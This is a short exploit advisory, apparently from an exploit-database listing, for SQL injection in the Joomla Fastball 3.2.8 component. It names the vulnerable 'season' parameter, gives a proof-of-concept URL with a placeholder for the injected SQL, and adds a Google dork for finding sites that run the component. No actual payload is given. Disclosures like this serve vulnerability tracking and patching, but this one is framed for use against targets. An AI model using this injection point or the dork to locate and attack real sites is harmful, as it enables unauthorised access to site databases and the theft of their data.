# Exploit Title: Joomla Component Fastball 3.2.8 - SQL Injection
# Date: 2017-02-11
# Home : https://extensions.joomla.org/extensions/extension/sports-a-games/sports/fastball/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_fastball
# Tested on: Linux
# POC :
# season Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?option=com_fastball&view=player&id=266&season=[SQL]&Itemid=28
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers